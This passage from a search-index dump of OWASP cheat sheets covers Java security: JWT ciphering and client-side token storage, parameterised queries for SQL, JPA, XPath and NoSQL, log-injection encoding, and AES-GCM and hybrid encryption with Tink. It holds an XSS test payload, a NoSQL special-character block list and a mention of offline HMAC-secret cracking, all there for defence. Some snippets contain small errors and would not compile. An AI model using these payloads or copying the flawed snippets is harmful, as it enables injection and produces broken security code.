keysetHandle) throws Exception {\n//Verify parameters\nif (jwtInHex == null || jwtInHex.isEmpty() || keysetHandle == null) {\nthrow new IllegalArgumentException(\"Both parameters must be specified !\");\n}\n\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Get the primitive\nAead aead = AeadFactory.getPrimitive(keysetHandle);\n\n//Decipher the token\nbyte[] decipheredToken = aead.decrypt(cipheredToken, null);\n\nreturn new String(decipheredToken);\n}\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#creation-validation-of-the-token","title":"Creation / Validation of the Token","text":"

Use the token ciphering handler during the creation and the validation of the token.

Load keys (ciphering key was generated and stored using Google Tink) and setup cipher.

//Load keys from configuration text/json files in order to avoid to storing keys as a String in JVM memory\nprivate transient byte[] keyHMAC = Files.readAllBytes(Paths.get(\"src\", \"main\", \"conf\", \"key-hmac.txt\"));\nprivate transient KeysetHandle keyCiphering = CleartextKeysetHandle.read(JsonKeysetReader.withFile(\nPaths.get(\"src\", \"main\", \"conf\", \"key-ciphering.json\").toFile()));\n\n...\n\n//Init token ciphering handler\nTokenCipher tokenCipher = new TokenCipher();\n

Token creation.

//Generate the JWT token using the JWT API...\n//Cipher the token (String JSON representation)\nString cipheredToken = tokenCipher.cipherToken(token, this.keyCiphering);\n//Send the ciphered token encoded in HEX to the client in HTTP response...\n

Token validation.

//Retrieve the ciphered token encoded in HEX from the HTTP request...\n//Decipher the token\nString token = tokenCipher.decipherToken(cipheredToken, this.keyCiphering);\n//Verify the token using the JWT API...\n//Verify access...\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-storage-on-client-side","title":"Token Storage on Client Side","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_4","title":"Symptom","text":"

This occurs when an application stores the token in a manner exhibiting the following behavior:

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_4","title":"How to Prevent","text":"
  1. Store the token using the browser sessionStorage container, or use JavaScript closures with private variables
  2. Add it as a Bearer HTTP Authentication header with JavaScript when calling services.
  3. Add fingerprint information to the token.

By storing the token in browser sessionStorage container it exposes the token to being stolen through a XSS attack. However, fingerprints added to the token prevent reuse of the stolen token by the attacker on their machine. To close a maximum of exploitation surfaces for an attacker, add a browser Content Security Policy to harden the execution context.

An alternative to storing token in browser sessionStorage is to use JavaScript private variable or Closures. In this, access to all web requests are routed through a JavaScript module that encapsulates the token in a private variable which can not be accessed other than from within the module.

Note:

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_4","title":"Implementation Example","text":"

JavaScript code to store the token after authentication.

/* Handle request for JWT token and local storage*/\nfunction authenticate() {\nconst login = $(\"#login\").val();\nconst postData = \"login=\" + encodeURIComponent(login) + \"&password=test\";\n\n$.post(\"/services/authenticate\", postData, function (data) {\nif (data.status == \"Authentication successful!\") {\n...\nsessionStorage.setItem(\"token\", data.token);\n}\nelse {\n...\nsessionStorage.removeItem(\"token\");\n}\n})\n.fail(function (jqXHR, textStatus, error) {\n...\nsessionStorage.removeItem(\"token\");\n});\n}\n

JavaScript code to add the token as a Bearer HTTP Authentication header when calling a service, for example a service to validate token here.

/* Handle request for JWT token validation */\nfunction validateToken() {\nvar token = sessionStorage.getItem(\"token\");\n\nif (token == undefined || token == \"\") {\n$(\"#infoZone\").removeClass();\n$(\"#infoZone\").addClass(\"alert alert-warning\");\n$(\"#infoZone\").text(\"Obtain a JWT token first :)\");\nreturn;\n}\n\n$.ajax({\nurl: \"/services/validate\",\ntype: \"POST\",\nbeforeSend: function (xhr) {\nxhr.setRequestHeader(\"Authorization\", \"bearer \" + token);\n},\nsuccess: function (data) {\n...\n},\nerror: function (jqXHR, textStatus, error) {\n...\n},\n});\n}\n

JavaScript code to implement closures with private variables:

function myFetchModule() {\n// Protect the original 'fetch' from getting overwritten via XSS\nconst fetch = window.fetch;\n\nconst authOrigins = [\"https://yourorigin\", \"http://localhost\"];\nlet token = '';\n\nthis.setToken = (value) => {\ntoken = value\n}\n\nthis.fetch = (resource, options) => {\nlet req = new Request(resource, options);\ndestOrigin = new URL(req.url).origin;\nif (token && authOrigins.includes(destOrigin)) {\nreq.headers.set('Authorization', token);\n}\nreturn fetch(req)\n}\n}\n\n...\n\n// usage:\nconst myFetch = new myFetchModule()\n\nfunction login() {\nfetch(\"/api/login\")\n.then((res) => {\nif (res.status == 200) {\nreturn res.json()\n} else {\nthrow Error(res.statusText)\n}\n})\n.then(data => {\nmyFetch.setToken(data.token)\nconsole.log(\"Token received and stored.\")\n})\n.catch(console.error)\n}\n\n...\n\n// after login, subsequent api calls:\nfunction makeRequest() {\nmyFetch.fetch(\"/api/hello\", {headers: {\"MyHeader\": \"foobar\"}})\n.then((res) => {\nif (res.status == 200) {\nreturn res.text()\n} else {\nthrow Error(res.statusText)\n}\n}).then(responseText => console.log(\"helloResponse\", responseText))\n.catch(console.error)\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#weak-token-secret","title":"Weak Token Secret","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_5","title":"Symptom","text":"

When the token is protected using an HMAC based algorithm, the security of the token is entirely dependent on the strength of the secret used with the HMAC. If an attacker can obtain a valid JWT, they can then carry out an offline attack and attempt to crack the secret using tools such as John the Ripper or Hashcat.

If they are successful, they would then be able to modify the token and re-sign it with the key they had obtained. This could let them escalate their privileges, compromise other users' accounts, or perform other actions depending on the contents of the JWT.

There are a number of guides that document this process in greater detail.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_5","title":"How to Prevent","text":"

The simplest way to prevent this attack is to ensure that the secret used to sign the JWTs is strong and unique, in order to make it harder for an attacker to crack. As this secret would never need to be typed by a human, it should be at least 64 characters, and generated using a secure source of randomness.

Alternatively, consider the use of tokens that are signed with RSA rather than using an HMAC and secret key.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#further-reading","title":"Further Reading","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html","title":"Java Security Cheat Sheet","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#injection-prevention-in-java","title":"Injection Prevention in Java","text":"

This section aims to provide tips to handle Injection in Java application code.

Sample code used in tips is located here.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#what-is-injection","title":"What is Injection","text":"

Injection in OWASP Top 10 is defined as following:

Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#general-advices-to-prevent-injection","title":"General advices to prevent Injection","text":"

The following point can be applied, in a general way, to prevent Injection issue:

  1. Apply Input Validation (using \"allow list\" approach) combined with Output Sanitizing+Escaping on user input/output.
  2. If you need to interact with system, try to use API features provided by your technology stack (Java / .Net / PHP...) instead of building command.

Additional advices are provided on this cheatsheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#specific-injection-types","title":"Specific Injection types","text":"

Examples in this section will be provided in Java technology (see Maven project associated) but advices are applicable to others technologies like .Net / PHP / Ruby / Python...

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#sql","title":"SQL","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build an SQL query using a String and execute it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent","title":"How to prevent","text":"

Use Query Parameterization in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example","title":"Example","text":"
/*No DB framework used here in order to show the real use of\n  Prepared Statement from Java API*/\n/*Open connection with H2 database and use it*/\nClass.forName(\"org.h2.Driver\");\nString jdbcUrl = \"jdbc:h2:file:\" + new File(\".\").getAbsolutePath() + \"/target/db\";\ntry (Connection con = DriverManager.getConnection(jdbcUrl)) {\n\n/* Sample A: Select data using Prepared Statement*/\nString query = \"select * from color where friendly_name = ?\";\nList<String> colors = new ArrayList<>();\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"yellow\");\ntry (ResultSet rSet = pStatement.executeQuery()) {\nwhile (rSet.next()) {\ncolors.add(rSet.getString(1));\n}\n}\n}\n\n/* Sample B: Insert data using Prepared Statement*/\nquery = \"insert into color(friendly_name, red, green, blue) values(?, ?, ?, ?)\";\nint insertedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"orange\");\npStatement.setInt(2, 239);\npStatement.setInt(3, 125);\npStatement.setInt(4, 11);\ninsertedRecordCount = pStatement.executeUpdate();\n}\n\n/* Sample C: Update data using Prepared Statement*/\nquery = \"update color set blue = ? where friendly_name = ?\";\nint updatedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setInt(1, 10);\npStatement.setString(2, \"orange\");\nupdatedRecordCount = pStatement.executeUpdate();\n}\n\n/* Sample D: Delete data using Prepared Statement*/\nquery = \"delete from color where friendly_name = ?\";\nint deletedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"orange\");\ndeletedRecordCount = pStatement.executeUpdate();\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#jpa","title":"JPA","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_1","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build a JPA query using a String and execute it. It's quite similar to SQL injection but here the altered language is not SQL but JPA QL.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_1","title":"How to prevent","text":"

Use Java Persistence Query Language Query Parameterization in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_1","title":"Example","text":"
EntityManager entityManager = null;\ntry {\n/* Get a ref on EntityManager to access DB */\nentityManager = Persistence.createEntityManagerFactory(\"testJPA\").createEntityManager();\n\n/* Define parameterized query prototype using named parameter to enhance readability */\nString queryPrototype = \"select c from Color c where c.friendlyName = :colorName\";\n\n/* Create the query, set the named parameter and execute the query */\nQuery queryObject = entityManager.createQuery(queryPrototype);\nColor c = (Color) queryObject.setParameter(\"colorName\", \"yellow\").getSingleResult();\n\n} finally {\nif (entityManager != null && entityManager.isOpen()) {\nentityManager.close();\n}\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_1","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#operating-system","title":"Operating System","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_2","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build an Operating System command using a String and execute it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_2","title":"How to prevent","text":"

Use technology stack API in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_2","title":"Example","text":"
/* The context taken is, for example, to perform a PING against a computer.\n* The prevention is to use the feature provided by the Java API instead of building\n* a system command as String and execute it */\nInetAddress host = InetAddress.getByName(\"localhost\");\nvar reachable = host.isReachable(5000);\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_2","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#xml-xpath-injection","title":"XML: XPath Injection","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_3","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build a XPath query using a String and execute it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_3","title":"How to prevent","text":"

Use XPath Variable Resolver in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_3","title":"Example","text":"

Variable Resolver implementation.

/**\n * Resolver in order to define parameter for XPATH expression.\n *\n */\npublic class SimpleVariableResolver implements XPathVariableResolver {\n\nprivate final Map<QName, Object> vars = new HashMap<QName, Object>();\n\n/**\n     * External methods to add parameter\n     *\n     * @param name Parameter name\n     * @param value Parameter value\n     */\npublic void addVariable(QName name, Object value) {\nvars.put(name, value);\n}\n\n/**\n     * {@inheritDoc}\n     *\n     * @see javax.xml.xpath.XPathVariableResolver#resolveVariable(javax.xml.namespace.QName)\n     */\npublic Object resolveVariable(QName variableName) {\nreturn vars.get(variableName);\n}\n}\n

Code using it to perform XPath query.

/*Create a XML document builder factory*/\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\n\n/*Disable External Entity resolution for different cases*/\n//Do not performed here in order to focus on variable resolver code\n//but do it for production code !\n\n/*Load XML file*/\nDocumentBuilder builder = dbf.newDocumentBuilder();\nDocument doc = builder.parse(new File(\"src/test/resources/SampleXPath.xml\"));\n\n/* Create and configure parameter resolver */\nString bid = \"bk102\";\nSimpleVariableResolver variableResolver = new SimpleVariableResolver();\nvariableResolver.addVariable(new QName(\"bookId\"), bid);\n\n/*Create and configure XPATH expression*/\nXPath xpath = XPathFactory.newInstance().newXPath();\nxpath.setXPathVariableResolver(variableResolver);\nXPathExpression xPathExpression = xpath.compile(\"//book[@id=$bookId]\");\n\n/* Apply expression on XML document */\nObject nodes = xPathExpression.evaluate(doc, XPathConstants.NODESET);\nNodeList nodesList = (NodeList) nodes;\nElement book = (Element)nodesList.item(0);\nvar containsRalls = book.getTextContent().contains(\"Ralls, Kim\");\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_3","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#htmljavascriptcss","title":"HTML/JavaScript/CSS","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_4","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build an HTTP response and sent it to browser.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_4","title":"How to prevent","text":"

Either apply strict input validation (\"allow list\" approach) or use output sanitizing+escaping if input validation is not possible (combine both every time is possible).

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_4","title":"Example","text":"
/*\nINPUT WAY: Receive data from user\nHere it's recommended to use strict input validation using \"allow list\" approach.\nIn fact, you ensure that only allowed characters are part of the input received.\n*/\n\nString userInput = \"You user login is owasp-user01\";\n\n/* First we check that the value contains only expected character*/\nif (!Pattern.matches(\"[a-zA-Z0-9\\\\s\\\\-]{1,50}\", userInput))\n{\nreturn false;\n}\n\n/* If the first check pass then ensure that potential dangerous character\nthat we have allowed for business requirement are not used in a dangerous way.\nFor example here we have allowed the character '-', and, this can\nbe used in SQL injection so, we\nensure that this character is not used is a continuous form.\nUse the API COMMONS LANG v3 to help in String analysis...\n*/\nIf (0 != StringUtils.countMatches(userInput.replace(\" \", \"\"), \"--\"))\n{\nreturn false;\n}\n\n/*\nOUTPUT WAY: Send data to user\nHere we escape + sanitize any data sent to user\nUse the OWASP Java HTML Sanitizer API to handle sanitizing\nUse the OWASP Java Encoder API to handle HTML tag encoding (escaping)\n*/\n\nString outputToUser = \"You <p>user login</p> is <strong>owasp-user01</strong>\";\noutputToUser += \"<script>alert(22);</script><img src='#' onload='javascript:alert(23);'>\";\n\n/* Create a sanitizing policy that only allow tag '<p>' and '<strong>'*/\nPolicyFactory policy = new HtmlPolicyBuilder().allowElements(\"p\", \"strong\").toFactory();\n\n/* Sanitize the output that will be sent to user*/\nString safeOutput = policy.sanitize(outputToUser);\n\n/* Encode HTML Tag*/\nsafeOutput = Encode.forHtml(safeOutput);\nString finalSafeOutputExpected = \"You <p>user login</p> is <strong>owasp-user01</strong>\";\nif (!finalSafeOutputExpected.equals(safeOutput))\n{\nreturn false;\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_4","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#ldap","title":"LDAP","text":"

A dedicated cheatsheet has been created.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#nosql","title":"NoSQL","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_5","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build a NoSQL API call expression.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_5","title":"How to prevent","text":"

As there many NoSQL database system and each one use an API for call, it's important to ensure that user input received and used to build the API call expression does not contain any character that have a special meaning in the target API syntax. This in order to avoid that it will be used to escape the initial call expression in order to create another one based on crafted user input. It's also important to not use string concatenation to build API call expression but use the API to create the expression.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-mongodb","title":"Example - MongoDB","text":"
 /* Here use MongoDB as target NoSQL DB */\nString userInput = \"Brooklyn\";\n\n/* First ensure that the input do no contains any special characters\nfor the current NoSQL DB call API,\nhere they are: ' \" \\ ; { } $\n*/\n//Avoid regexp this time in order to made validation code\n//more easy to read and understand...\nArrayList < String > specialCharsList = new ArrayList < String > () {\n{\nadd(\"'\");\nadd(\"\\\"\");\nadd(\"\\\\\");\nadd(\";\");\nadd(\"{\");\nadd(\"}\");\nadd(\"$\");\n}\n};\n\nfor (String specChar: specialCharsList) {\nif (userInput.contains(specChar)) {\nreturn false;\n}\n}\n\n//Add also a check on input max size\nif (!userInput.length() <= 50)\n{\nreturn false;\n}\n\n/* Then perform query on database using API to build expression */\n//Connect to the local MongoDB instance\ntry(MongoClient mongoClient = new MongoClient()){\nMongoDatabase db = mongoClient.getDatabase(\"test\");\n//Use API query builder to create call expression\n//Create expression\nBson expression = eq(\"borough\", userInput);\n//Perform call\nFindIterable<org.bson.Document> restaurants = db.getCollection(\"restaurants\").find(expression);\n//Verify result consistency\nrestaurants.forEach(new Block<org.bson.Document>() {\n@Override\npublic void apply(final org.bson.Document doc) {\nString restBorough = (String)doc.get(\"borough\");\nif (!\"Brooklyn\".equals(restBorough))\n{\nreturn false;\n}\n}\n});\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_5","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#log-injection","title":"Log Injection","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_6","title":"Symptom","text":"

Log Injection occurs when an application includes untrusted data in an application log message (e.g., an attacker can cause an additional log entry that looks like it came from a completely different user, if they can inject CRLF characters in the untrusted data). More information about this attack is available on the OWASP Log Injection page.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_6","title":"How to prevent","text":"

To prevent an attacker from writing malicious content into the application log, apply defenses such as:

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-using-log4j2","title":"Example using Log4j2","text":"

Configuration of a logging policy to roll on 10 files of 5MB each, and encode/limit the log message using the Pattern encode{}{CRLF}, introduced in Log4j2 v2.10.0, and the -500m message size limit.:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Configuration status=\"error\" name=\"SecureLoggingPolicy\">\n<Appenders>\n<RollingFile name=\"RollingFile\" fileName=\"App.log\" filePattern=\"App-%i.log\" ignoreExceptions=\"false\">\n<PatternLayout>\n<!-- Encode any CRLF chars in the message and limit its\n                     maximum size to 500 characters -->\n<Pattern>%d{ISO8601} %-5p - %encode{ %.-500m }{CRLF}%n</Pattern>\n</PatternLayout>\n<Policies>\n<SizeBasedTriggeringPolicy size=\"5MB\"/>\n</Policies>\n<DefaultRolloverStrategy max=\"10\"/>\n</RollingFile>\n</Appenders>\n<Loggers>\n<Root level=\"debug\">\n<AppenderRef ref=\"RollingFile\"/>\n</Root>\n</Loggers>\n</Configuration>\n

Usage of the logger at code level:

import org.apache.logging.log4j.LogManager;\nimport org.apache.logging.log4j.Logger;\n...\n// No special action needed because security actions are\n// performed at the logging policy level\nLogger logger = LogManager.getLogger(MyClass.class);\nlogger.info(logMessage);\n...\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-using-logback-with-the-owasp-security-logging-library","title":"Example using Logback with the OWASP Security Logging library","text":"

Configuration of a logging policy to roll on 10 files of 5MB each, and encode/limit the log message using the CRLFConverter, provided by the no longer active OWASP Security Logging Project, and the -500msg message size limit:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<configuration>\n<!-- Define the CRLFConverter -->\n<conversionRule conversionWord=\"crlf\" converterClass=\"org.owasp.security.logging.mask.CRLFConverter\" />\n<appender name=\"RollingFile\" class=\"ch.qos.logback.core.rolling.RollingFileAppender\">\n<file>App.log</file>\n<rollingPolicy class=\"ch.qos.logback.core.rolling.FixedWindowRollingPolicy\">\n<fileNamePattern>App-%i.log</fileNamePattern>\n<minIndex>1</minIndex>\n<maxIndex>10</maxIndex>\n</rollingPolicy>\n<triggeringPolicy class=\"ch.qos.logback.core.rolling.SizeBasedTriggeringPolicy\">\n<maxFileSize>5MB</maxFileSize>\n</triggeringPolicy>\n<encoder>\n<!-- Encode any CRLF chars in the message and limit\n                 its maximum size to 500 characters -->\n<pattern>%relative [%thread] %-5level %logger{35} - %crlf(%.-500msg) %n</pattern>\n</encoder>\n</appender>\n<root level=\"debug\">\n<appender-ref ref=\"RollingFile\" />\n</root>\n</configuration>\n

You also have to add the OWASP Security Logging dependency to your project.

Usage of the logger at code level:

import org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n...\n// No special action needed because security actions\n// are performed at the logging policy level\nLogger logger = LoggerFactory.getLogger(MyClass.class);\nlogger.info(logMessage);\n...\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_6","title":"References","text":"
Note that the default Log4j2 encode{} encoder is HTML, which does NOT prevent log injection.\n\nIt prevents XSS attacks against viewing logs using a browser.\n\nOWASP recommends defending against XSS attacks in such situations in the log viewer application itself,\nnot by preencoding all the log messages with HTML encoding as such log entries may be used/viewed in many\nother log viewing/analysis tools that don't expect the log data to be pre-HTML encoded.\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#general-cryptography-guidance","title":"General cryptography guidance","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#encryption-for-storage","title":"Encryption for storage","text":"

Follow the algorithm guidance in the OWASP Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symmetric-example-using-google-tink","title":"Symmetric example using Google Tink","text":"

Google Tink has documentation on performing common tasks.

For example, this page (from Google's website) shows how to perform simple symmetric encryption.

The following code snippet shows an encapsulated use of this functionality:

Click here to view the \"Tink symmetric encryption\" code snippet.
import static java.nio.charset.StandardCharsets.UTF_8;\n\nimport com.google.crypto.tink.Aead;\nimport com.google.crypto.tink.InsecureSecretKeyAccess;\nimport com.google.crypto.tink.KeysetHandle;\nimport com.google.crypto.tink.TinkJsonProtoKeysetFormat;\nimport com.google.crypto.tink.aead.AeadConfig;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.Base64;\n\n// AesGcmSimpleTest\npublic class App {\n\n// Based on example from:\n// https://github.com/tink-crypto/tink-java/tree/main/examples/aead\n\npublic static void main(String[] args) throws Exception {\n\n// Key securely generated using:\n// tinkey create-keyset --key-template AES128_GCM --out-format JSON --out aead_test_keyset.json\n\n\n\n// Register all AEAD key types with the Tink runtime.\nAeadConfig.register();\n\n// Read the keyset into a KeysetHandle.\nKeysetHandle handle =\nTinkJsonProtoKeysetFormat.parseKeyset(\nnew String(Files.readAllBytes( Paths.get(\"/home/fredbloggs/aead_test_keyset.json\")), UTF_8), InsecureSecretKeyAccess.get());\n\nString message = \"This message to be encrypted\";\nSystem.out.println(message);\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata = \"Sender: fredbloggs@example.com\";\n\n// Encrypt the message\nbyte[] cipherText = AesGcmSimple.encrypt(message, metadata, handle);\nSystem.out.println(Base64.getEncoder().encodeToString(cipherText));\n\n// Decrypt the message\nString message2 = AesGcmSimple.decrypt(cipherText, metadata, handle);\nSystem.out.println(message2);\n}\n}\n\nclass AesGcmSimple {\n\npublic static byte[] encrypt(String plaintext, String metadata, KeysetHandle handle) throws Exception {\n// Get the primitive.\nAead aead = handle.getPrimitive(Aead.class);\nreturn aead.encrypt(plaintext.getBytes(UTF_8), metadata.getBytes(UTF_8));\n}\n\npublic static String decrypt(byte[] ciphertext, String metadata, KeysetHandle handle) throws Exception {\n// Get the primitive.\nAead aead = handle.getPrimitive(Aead.class);\nreturn new String(aead.decrypt(ciphertext, metadata.getBytes(UTF_8)),UTF_8);\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symmetric-example-using-built-in-jcajce-classes","title":"Symmetric example using built-in JCA/JCE classes","text":"

If you absolutely cannot use a separate library, it is still possible to use the built JCA/JCE classes but it is strongly recommended to have a cryptography expert review the full design and code, as even the most trivial error can severely weaken your encryption.

The following code snippet shows an example of using AES-GCM to perform encryption/decryption of data.

A few constraints/pitfalls with this code:

Click here to view the \"JCA/JCE symmetric encryption\" code snippet.
import java.nio.charset.StandardCharsets;\nimport java.security.SecureRandom;\nimport javax.crypto.spec.*;\nimport javax.crypto.*;\nimport java.util.Base64;\n\n\n// AesGcmSimpleTest\nclass Main {\n\npublic static void main(String[] args) throws Exception {\n// Key of 32 bytes / 256 bits for AES\nKeyGenerator keyGen = KeyGenerator.getInstance(AesGcmSimple.ALGORITHM);\nkeyGen.init(AesGcmSimple.KEY_SIZE, new SecureRandom());\nSecretKey secretKey = keyGen.generateKey();\n\n// Nonce of 12 bytes / 96 bits and this size should always be used.\n// It is critical for AES-GCM that a unique nonce is used for every cryptographic operation.\nbyte[] nonce = new byte[AesGcmSimple.IV_LENGTH];\nSecureRandom random = new SecureRandom();\nrandom.nextBytes(nonce);\n\nvar message = \"This message to be encrypted\";\nSystem.out.println(message);\n\n// Encrypt the message\nbyte[] cipherText = AesGcmSimple.encrypt(message, nonce, secretKey);\nSystem.out.println(Base64.getEncoder().encodeToString(cipherText));\n\n// Decrypt the message\nvar message2 = AesGcmSimple.decrypt(cipherText, nonce, secretKey);\nSystem.out.println(message2);\n}\n}\n\nclass AesGcmSimple {\n\npublic static final String ALGORITHM = \"AES\";\npublic static final String CIPHER_ALGORITHM = \"AES/GCM/NoPadding\";\npublic static final int KEY_SIZE = 256;\npublic static final int TAG_LENGTH = 128;\npublic static final int IV_LENGTH = 12;\n\npublic static byte[] encrypt(String plaintext, byte[] nonce, SecretKey secretKey) throws Exception {\nreturn cryptoOperation(plaintext.getBytes(StandardCharsets.UTF_8), nonce, secretKey, Cipher.ENCRYPT_MODE);\n}\n\npublic static String decrypt(byte[] ciphertext, byte[] nonce, SecretKey secretKey) throws Exception {\nreturn new String(cryptoOperation(ciphertext, nonce, secretKey, Cipher.DECRYPT_MODE), StandardCharsets.UTF_8);\n}\n\nprivate static byte[] cryptoOperation(byte[] text, byte[] nonce, SecretKey secretKey, int mode) throws Exception {\nCipher cipher = Cipher.getInstance(CIPHER_ALGORITHM);\nGCMParameterSpec gcmParameterSpec = new GCMParameterSpec(TAG_LENGTH, nonce);\ncipher.init(mode, secretKey, gcmParameterSpec);\nreturn cipher.doFinal(text);\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#encryption-for-transmission","title":"Encryption for transmission","text":"

Again, follow the algorithm guidance in the OWASP Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#asymmetric-example-using-google-tink","title":"Asymmetric example using Google Tink","text":"

Google Tink has documentation on performing common tasks.

For example, this page (from Google's website) shows how to perform a hybrid encryption process where two parties want to share data based on their asymmetric key pair.

The following code snippet shows how this functionality can be used to share secrets between Alice and Bob:

Click here to view the \"Tink hybrid encryption\" code snippet.
import static java.nio.charset.StandardCharsets.UTF_8;\n\nimport com.google.crypto.tink.HybridDecrypt;\nimport com.google.crypto.tink.HybridEncrypt;\nimport com.google.crypto.tink.InsecureSecretKeyAccess;\nimport com.google.crypto.tink.KeysetHandle;\nimport com.google.crypto.tink.TinkJsonProtoKeysetFormat;\nimport com.google.crypto.tink.hybrid.HybridConfig;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.Base64;\n\n// HybridReplaceTest\nclass App {\npublic static void main(String[] args) throws Exception {\n/*\n\n        Generated public/private keypairs for Bob and Alice using the\n        following tinkey commands:\n\n        ./tinkey create-keyset \\\n        --key-template DHKEM_X25519_HKDF_SHA256_HKDF_SHA256_AES_256_GCM \\\n        --out-format JSON --out alice_private_keyset.json\n\n        ./tinkey create-keyset \\\n        --key-template DHKEM_X25519_HKDF_SHA256_HKDF_SHA256_AES_256_GCM \\\n        --out-format JSON --out bob_private_keyset.json\n\n        ./tinkey create-public-keyset --in alice_private_keyset.json \\\n        --in-format JSON --out-format JSON --out alice_public_keyset.json\n\n        ./tinkey create-public-keyset --in bob_private_keyset.json \\\n        --in-format JSON --out-format JSON --out bob_public_keyset.json\n        */\n\nHybridConfig.register();\n\n// Generate ECC key pair for Alice\nvar alice = new HybridSimple(\ngetKeysetHandle(\"/home/alicesmith/private_keyset.json\"),\ngetKeysetHandle(\"/home/alicesmith/public_keyset.json\")\n\n);\n\nKeysetHandle alicePublicKey = alice.getPublicKey();\n\n// Generate ECC key pair for Bob\nvar bob = new HybridSimple(\ngetKeysetHandle(\"/home/bobjones/private_keyset.json\"),\ngetKeysetHandle(\"/home/bobjones/public_keyset.json\")\n\n);\n\nKeysetHandle bobPublicKey = bob.getPublicKey();\n\n// This keypair generation shoud be reperformed 